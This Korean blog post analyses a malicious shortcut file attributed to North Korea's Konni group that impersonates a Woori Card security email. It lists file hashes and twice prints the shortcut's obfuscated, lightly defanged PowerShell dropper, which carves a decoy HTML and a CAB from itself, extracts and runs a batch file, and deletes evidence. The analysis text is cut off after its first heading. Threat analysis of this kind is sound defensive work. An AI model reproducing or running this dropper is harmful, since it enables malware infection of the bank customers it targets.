북한 코니(Konni)에서 제작한 것으로 추측 되는 악성코드 우리은행 사용자 노린 악성코드 WooriCard_20231108.html.lnk(2025.5.19)
Contents
오늘은 세계적으로 유명한 APT 조직 북한 코니(Konni)에서 제작한 악성코드 우리은행 사용자 노린 악성코드 WooriCard_20231108.html.lnk(2025.5.19) 에 대해 분석을 해보겠습니다. 일단 해당 악성코드는 우리은행에서 발급하는 우리카드 보안 메일로 위장하는 악성코드입니다.
파일명: WooriCard_20231108.html.lnk
사이즈:50 MB
MD5:7672a9bf5a58e2c17925dbb759ea98ce
SHA-1:ac56bdd7cead82ede6690355e7c9924b1174a1da
SHA-256:50826fc1142a3442c04576c68478eab4909481f010d5eb19220c1757adb272b9
일단 악성코드 내부를 열어보면 난독화된 PowerShell 코드를 볼수가 있습니다.
악성코드 PowerShell
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments:/q /c Set O=(a)JEC18wHj4v(y)Ix(h)0WAo3R5O2UgXfPKilNur6tF9n(c)pMQGYeBVDdZzskb
TqL7Sm && call %O:~41,1(%)%O:~18,(1)%%(O):~6,1%%O:~(4)6,1%%O:~34,1%%O:~53(,)1%%
O:~14,1%%O:~46,1%%O:~31,1%%O:~31,1% -%O:~6,1(%)%O:~30,1%%O:(~)39,1%%(O):~5(0),1
(%)%O:~18,1%%O:~6,1%%O:~53,1%%O(:)~36,1%(%)O:~11,1%%O:~31,1%%O:~46,1% %O:~14,(1)
%%O:~30,1%%(O):~5(0),1(%)%O:~50(,)1%%O:~46,1%%O:~39,1% "$LMM4w(p)hBh = Get-Loc(a
)tion;$eTmNMNm(7)CggKR = Get-C(h)ildItem -Path $(L)M(M04wphBh -Recurse *(.)lnk | w
he(r)e-object {$_.length -eq 0x031CCCCC} | Select-Object -ExpandProperty FullName;if($eTm
NMNm7CggKR.length -eq 0) {$LMM4wphBh = $env:Temp;$eTm(N)MNm7CggKR = Get-ChildItem -Path $
LMM4wphBh -Recurse *.lnk | where-object {$_.length -eq 0x031CCCCC} | Select-Object -Expan
dProperty FullName;};$LMM(4)wphBh = Split-Path $eTmNMNm7CggKR;$o(1)o20Ei7S709 = New-Objec
t System.IO(.)FileStream($eTmNMNm7CggKR, [System.IO.FileMode]::Open, [Syste(m).IO.FileAcc
ess]::Read);$o1o20(E)i7S709.Se(e)k(0x00001C30, [System(.)IO.Se(e)kOrigin]::Begin);$Ym16Gf
c = New-Object byte[] 0x0001C(7)0D;$o1o20(E)i7S709.Read($Ym16Gfc, 0, 0x0001C70D);$cRi9qh(
9)eTly = $LMM4wphBh + '\' + [regex]::unesca(p)e('WooriCard_20231108.ht(m)l');sc $cRi9qh9e
Tly $Ym16Gfc -Encoding Byt(e);& $cRi9qh9e(T)ly;$o1o20Ei(7)S709.Seek(0x0001E33D, [System.I
O.SeekOri(g)in]::Begin);$tto4r6kwNfxWgy=New-Object byte[] 0x(0)000105E;$o1o20Ei7S709.Read
($tto4r6kwNfxWgy, 0, 0x0000105E);$o1o20Ei7S709(.)Close();Remove-Item -Path $eTmNMNm7CggKR
-Forc(e);$TojyxlrTd5UI=$env:public + '\batchsv392.cab';sc $TojyxlrTd5UI $tto4r6kwNfxWgy -
Encoding By(t)e;$J2kZXJJlWcVYyl=$env:public (+) '\Libraries';expand $TojyxlrTd(5)UI -f:*
$J2kZXJJlWcVYyl;$xgE_o(O)ikIPOT=$J2kZXJJlWcVYyl + '\avtue483(.)bat';&$xgE_oOikIPOT;Remove
-Item -Pa(t)h $TojyxlrTd5UI -Force;"
iconlocation: .html
}
악성코드 분석
일단 해당 악성코드는 substring 방식을 사용하는 것을 볼 수가 있습니다.
1. 초기 명령 …
파일명: WooriCard_20231108.html.lnk
사이즈:50 MB
MD5:7672a9bf5a58e2c17925dbb759ea98ce
SHA-1:ac56bdd7cead82ede6690355e7c9924b1174a1da
SHA-256:50826fc1142a3442c04576c68478eab4909481f010d5eb19220c1757adb272b9
일단 악성코드 내부를 열어보면 난독화된 PowerShell 코드를 볼수가 있습니다.
악성코드 PowerShell
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments:/q /c Set O=(a)JEC18wHj4v(y)Ix(h)0WAo3R5O2UgXfPKilNur6tF9n(c)pMQGYeBVDdZzskb
TqL7Sm && call %O:~41,1(%)%O:~18,(1)%%(O):~6,1%%O:~(4)6,1%%O:~34,1%%O:~53(,)1%%
O:~14,1%%O:~46,1%%O:~31,1%%O:~31,1% -%O:~6,1(%)%O:~30,1%%O:(~)39,1%%(O):~5(0),1
(%)%O:~18,1%%O:~6,1%%O:~53,1%%O(:)~36,1%(%)O:~11,1%%O:~31,1%%O:~46,1% %O:~14,(1)
%%O:~30,1%%(O):~5(0),1(%)%O:~50(,)1%%O:~46,1%%O:~39,1% "$LMM4w(p)hBh = Get-Loc(a
)tion;$eTmNMNm(7)CggKR = Get-C(h)ildItem -Path $(L)M(M04wphBh -Recurse *(.)lnk | w
he(r)e-object {$_.length -eq 0x031CCCCC} | Select-Object -ExpandProperty FullName;if($eTm
NMNm7CggKR.length -eq 0) {$LMM4wphBh = $env:Temp;$eTm(N)MNm7CggKR = Get-ChildItem -Path $
LMM4wphBh -Recurse *.lnk | where-object {$_.length -eq 0x031CCCCC} | Select-Object -Expan
dProperty FullName;};$LMM(4)wphBh = Split-Path $eTmNMNm7CggKR;$o(1)o20Ei7S709 = New-Objec
t System.IO(.)FileStream($eTmNMNm7CggKR, [System.IO.FileMode]::Open, [Syste(m).IO.FileAcc
ess]::Read);$o1o20(E)i7S709.Se(e)k(0x00001C30, [System(.)IO.Se(e)kOrigin]::Begin);$Ym16Gf
c = New-Object byte[] 0x0001C(7)0D;$o1o20(E)i7S709.Read($Ym16Gfc, 0, 0x0001C70D);$cRi9qh(
9)eTly = $LMM4wphBh + '\' + [regex]::unesca(p)e('WooriCard_20231108.ht(m)l');sc $cRi9qh9e
Tly $Ym16Gfc -Encoding Byt(e);& $cRi9qh9e(T)ly;$o1o20Ei(7)S709.Seek(0x0001E33D, [System.I
O.SeekOri(g)in]::Begin);$tto4r6kwNfxWgy=New-Object byte[] 0x(0)000105E;$o1o20Ei7S709.Read
($tto4r6kwNfxWgy, 0, 0x0000105E);$o1o20Ei7S709(.)Close();Remove-Item -Path $eTmNMNm7CggKR
-Forc(e);$TojyxlrTd5UI=$env:public + '\batchsv392.cab';sc $TojyxlrTd5UI $tto4r6kwNfxWgy -
Encoding By(t)e;$J2kZXJJlWcVYyl=$env:public (+) '\Libraries';expand $TojyxlrTd(5)UI -f:*
$J2kZXJJlWcVYyl;$xgE_o(O)ikIPOT=$J2kZXJJlWcVYyl + '\avtue483(.)bat';&$xgE_oOikIPOT;Remove
-Item -Pa(t)h $TojyxlrTd5UI -Force;"
iconlocation: .html
}
악성코드 분석
일단 해당 악성코드는 substring 방식을 사용하는 것을 볼 수가 있습니다.
1. 초기 명령 …
IoC
7672a9bf5a58e2c17925dbb759ea98ce
ac56bdd7cead82ede6690355e7c9924b1174a1da
50826fc1142a3442c04576c68478eab4909481f010d5eb19220c1757adb272b9
ac56bdd7cead82ede6690355e7c9924b1174a1da
50826fc1142a3442c04576c68478eab4909481f010d5eb19220c1757adb272b9